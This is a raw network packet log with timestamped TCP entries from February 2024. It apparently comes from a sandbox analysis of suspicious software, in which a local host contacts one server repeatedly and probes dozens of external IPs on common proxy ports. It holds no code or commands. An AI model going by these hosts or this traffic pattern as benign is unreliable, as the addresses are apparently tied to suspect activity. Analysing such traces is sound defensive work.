                                                                                Feb 23, 2024 14:28:23.626302004 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626341105 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626358986 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.626372099 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.626384974 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626394033 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626455069 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626458883 CET5076982192.168.2.8217.199.151.94
                                                                                Feb 23, 2024 14:28:23.626485109 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.626490116 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626521111 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.626528025 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626573086 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626626968 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626653910 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626666069 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.626677990 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.626688957 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626718044 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626738071 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626791000 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626806021 CET510139764192.168.2.8162.243.102.207
                                                                                Feb 23, 2024 14:28:23.626816034 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.626833916 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626970053 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627010107 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627042055 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.627057076 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627104044 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.627175093 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627183914 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627245903 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627279997 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627294064 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627314091 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.627338886 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627382994 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.627403975 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627469063 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627572060 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627618074 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.627635956 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627682924 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627692938 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.627763033 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627826929 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627859116 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.627863884 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627907038 CET5101464938192.168.2.8148.72.209.174
                                                                                Feb 23, 2024 14:28:23.627907991 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627908945 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.627918005 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627975941 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.627985954 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628014088 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628053904 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628078938 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628088951 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628114939 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628123045 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628139019 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628151894 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628165960 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628174067 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628196955 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628200054 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628258944 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628304005 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628349066 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628362894 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628376961 CET510158080192.168.2.8103.132.52.122
                                                                                Feb 23, 2024 14:28:23.628387928 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628427982 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628449917 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628465891 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628509998 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628532887 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628540039 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628566027 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628591061 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628619909 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628645897 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628669024 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628684998 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628731012 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628752947 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.628823996 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628830910 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628870010 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628878117 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628885031 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628930092 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628947973 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628954887 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.628988981 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629023075 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629057884 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629072905 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629098892 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629132986 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629141092 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629162073 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629211903 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629250050 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629257917 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629266024 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629288912 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629316092 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629318953 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629318953 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629343987 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629369020 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629409075 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629447937 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629492998 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629542112 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629556894 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629578114 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629578114 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629606962 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629664898 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629673004 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629698992 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629728079 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629739046 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629777908 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629786015 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629822969 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629853964 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629899025 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629930019 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629934072 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.629946947 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629966021 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.629986048 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630007029 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.630039930 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.630048990 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630069017 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630105972 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630132914 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.630134106 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630162954 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630189896 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.630204916 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630306959 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.630346060 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630388021 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630414009 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630464077 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630486965 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630491972 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.630516052 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630549908 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.630568027 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630589008 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630614042 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.630620003 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630646944 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630666971 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.630707026 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630732059 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.630809069 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630886078 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.630959988 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631004095 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631062984 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631066084 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631098032 CET510168089192.168.2.8117.69.233.44
                                                                                Feb 23, 2024 14:28:23.631104946 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631110907 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631156921 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631177902 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631185055 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631215096 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631242990 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631253958 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631299019 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631305933 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631354094 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631441116 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631513119 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631526947 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631535053 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631539106 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631544113 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631557941 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631567001 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631567001 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631575108 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631597996 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631634951 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631660938 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631669998 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631692886 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631719112 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631742954 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631767035 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631774902 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631782055 CET510173128192.168.2.8154.223.20.21
                                                                                Feb 23, 2024 14:28:23.631810904 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631853104 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631863117 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631874084 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631886959 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631900072 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.631925106 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631954908 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.631967068 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.632045984 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632051945 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.632055998 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632123947 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.632131100 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632148981 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632193089 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632206917 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632215977 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632234097 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.632236958 CET5051280192.168.2.850.222.245.47
                                                                                Feb 23, 2024 14:28:23.632240057 CET5005844712192.168.2.892.204.135.4
                                                                                Feb 23, 2024 14:28:23.632244110 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.632246971 CET5051110293192.168.2.875.119.145.169
                                                                                Feb 23, 2024 14:28:23.632246971 CET5046452116192.168.2.8188.255.244.83
                                                                                Feb 23, 2024 14:28:23.632257938 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632286072 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.632297039 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632322073 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632332087 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632354975 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.632375956 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.632402897 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632411003 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632426023 CET8050834175.183.82.221192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632433891 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632457972 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.632483959 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632525921 CET5083480192.168.2.8175.183.82.221
                                                                                Feb 23, 2024 14:28:23.632611990 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632644892 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632647991 CET5083480192.168.2.8175.183.82.221
                                                                                Feb 23, 2024 14:28:23.632672071 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.632711887 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632744074 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.632811069 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632904053 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.632975101 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633074045 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.633078098 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633088112 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633152962 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633157969 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.633162022 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633177996 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633228064 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633251905 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633251905 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.633271933 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633292913 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.633322954 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633363008 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.633760929 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633871078 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.633874893 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.634234905 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.634310007 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.634341002 CET510181080192.168.2.85.252.23.220
                                                                                Feb 23, 2024 14:28:23.634372950 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.634434938 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.634506941 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.634540081 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.634599924 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.634648085 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.634730101 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.634747982 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.634861946 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.634875059 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.634886980 CET510198080192.168.2.8103.180.194.146
                                                                                Feb 23, 2024 14:28:23.634927034 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.635037899 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.635113001 CET3808050184152.32.238.63192.168.2.8
                                                                                Feb 23, 2024 14:28:23.635139942 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.635210037 CET5018438080192.168.2.8152.32.238.63
                                                                                Feb 23, 2024 14:28:23.635305882 CET8050312143.198.241.47192.168.2.8
                                                                                Feb 23, 2024 14:28:23.635343075 CET5018438080192.168.2.8152.32.238.63
                                                                                Feb 23, 2024 14:28:23.635361910 CET31285019834.83.143.6192.168.2.8
                                                                                Feb 23, 2024 14:28:23.636221886 CET156735086043.153.133.208192.168.2.8
                                                                                Feb 23, 2024 14:28:23.636336088 CET5086015673192.168.2.843.153.133.208
                                                                                Feb 23, 2024 14:28:23.636477947 CET5086015673192.168.2.843.153.133.208
                                                                                Feb 23, 2024 14:28:23.636516094 CET510204153192.168.2.895.43.244.15
                                                                                Feb 23, 2024 14:28:23.637346029 CET31295058620.204.190.254192.168.2.8
                                                                                Feb 23, 2024 14:28:23.637469053 CET5102131028192.168.2.8198.199.70.20
                                                                                Feb 23, 2024 14:28:23.637639046 CET156735008843.128.155.154192.168.2.8
                                                                                Feb 23, 2024 14:28:23.637902021 CET505863129192.168.2.820.204.190.254
                                                                                Feb 23, 2024 14:28:23.638170958 CET8050861104.22.50.220192.168.2.8
                                                                                Feb 23, 2024 14:28:23.638206005 CET5102220341192.168.2.8173.212.240.168
                                                                                Feb 23, 2024 14:28:23.638371944 CET80804974382.135.123.155192.168.2.8
                                                                                Feb 23, 2024 14:28:23.638547897 CET5388250787171.244.140.160192.168.2.8
                                                                                Feb 23, 2024 14:28:23.638665915 CET5078753882192.168.2.8171.244.140.160
                                                                                Feb 23, 2024 14:28:23.638809919 CET5078753882192.168.2.8171.244.140.160
                                                                                Feb 23, 2024 14:28:23.639549971 CET5102380192.168.2.8104.19.233.117
                                                                                Feb 23, 2024 14:28:23.639976025 CET646750590107.181.141.70192.168.2.8
                                                                                Feb 23, 2024 14:28:23.641390085 CET5102580192.168.2.8202.5.16.44
                                                                                Feb 23, 2024 14:28:23.641438961 CET510248080192.168.2.8113.161.59.136
                                                                                Feb 23, 2024 14:28:23.642072916 CET90235093967.43.227.227192.168.2.8
                                                                                Feb 23, 2024 14:28:23.642307997 CET5102629380192.168.2.837.187.77.58
                                                                                Feb 23, 2024 14:28:23.643604994 CET510278080192.168.2.8106.51.62.106
                                                                                Feb 23, 2024 14:28:23.643631935 CET5102880192.168.2.8202.60.194.23
                                                                                Feb 23, 2024 14:28:23.643769979 CET804985043.231.22.229192.168.2.8
                                                                                Feb 23, 2024 14:28:23.643961906 CET8050842213.33.2.28192.168.2.8
                                                                                Feb 23, 2024 14:28:23.644078016 CET4985080192.168.2.843.231.22.229
                                                                                Feb 23, 2024 14:28:23.644248962 CET804998832.223.6.94192.168.2.8
                                                                                Feb 23, 2024 14:28:23.644623995 CET6068450911162.210.192.135192.168.2.8
                                                                                Feb 23, 2024 14:28:23.644926071 CET510298080192.168.2.8152.70.139.52
                                                                                Feb 23, 2024 14:28:23.645512104 CET510304145192.168.2.8103.12.246.113
                                                                                Feb 23, 2024 14:28:23.646223068 CET4624949869167.172.109.12192.168.2.8
                                                                                Feb 23, 2024 14:28:23.646415949 CET5103180192.168.2.8194.31.64.44
                                                                                Feb 23, 2024 14:28:23.647624969 CET5103280192.168.2.850.170.90.26
                                                                                Feb 23, 2024 14:28:23.647852898 CET502441080192.168.2.8180.210.222.205
                                                                                Feb 23, 2024 14:28:23.647857904 CET5024214719192.168.2.8152.228.140.225
                                                                                Feb 23, 2024 14:28:23.647866011 CET5024359727192.168.2.892.204.134.38
                                                                                Feb 23, 2024 14:28:23.647866011 CET505183128192.168.2.891.149.224.168
                                                                                Feb 23, 2024 14:28:23.649533987 CET41455090298.188.47.132192.168.2.8
                                                                                Feb 23, 2024 14:28:23.649540901 CET80895081458.219.248.202192.168.2.8
                                                                                Feb 23, 2024 14:28:23.649578094 CET510334128192.168.2.8181.81.245.194
                                                                                Feb 23, 2024 14:28:23.649647951 CET509024145192.168.2.898.188.47.132
                                                                                Feb 23, 2024 14:28:23.649770021 CET509024145192.168.2.898.188.47.132
                                                                                Feb 23, 2024 14:28:23.650135994 CET510345678192.168.2.8195.175.22.194
                                                                                Feb 23, 2024 14:28:23.651503086 CET15855051467.43.236.20192.168.2.8
                                                                                Feb 23, 2024 14:28:23.651537895 CET510359180192.168.2.894.23.252.168
                                                                                Feb 23, 2024 14:28:23.651566029 CET261695050567.43.236.20192.168.2.8
                                                                                Feb 23, 2024 14:28:23.652487040 CET510368080192.168.2.845.250.215.8
                                                                                Feb 23, 2024 14:28:23.654011965 CET5103749032192.168.2.8162.241.40.187
                                                                                Feb 23, 2024 14:28:23.655030966 CET510381976192.168.2.8154.236.177.100
                                                                                Feb 23, 2024 14:28:23.656219006 CET510393128192.168.2.8104.165.127.197
